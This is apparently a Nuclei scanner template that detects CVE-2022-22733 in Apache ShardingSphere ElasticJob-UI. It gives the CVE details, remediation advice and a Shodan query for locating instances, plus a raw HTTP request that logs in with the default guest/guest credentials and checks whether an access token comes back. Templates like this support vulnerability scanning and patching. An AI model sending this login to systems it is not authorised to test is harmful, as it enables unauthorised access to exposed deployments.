id: CVE-2022-22733 info: name: Apache ShardingSphere ElasticJob-UI privilege escalation author: Zeyad Azima severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6 - http://www.openwall.com/lists/oss-security/2022/01/20/2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.23758 epss-percentile: 0.96044 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 tags: cve,cve2023,exposure,sharingsphere,apache http: - raw: - | POST /api/login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Access-Token: Content-Type: application/json;charset=UTF-8 Origin: {{RootURL}} Referer: {{RootURL}} {"username":"guest","password":"guest"} matchers-condition: and matchers: - type: word part: body words: - '"success":true' - '"isGuest":true' - '"accessToken":' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a00463044022061389c5b3a8b5896a2810ef66704e09ef349133921ac7af035dffbb4f254a48302201322c26d95092edd8c7a1fe20da6b72d543a0c1602ee2974de1e18d199dff70e:922c64590222798bb761d5b6d8e72950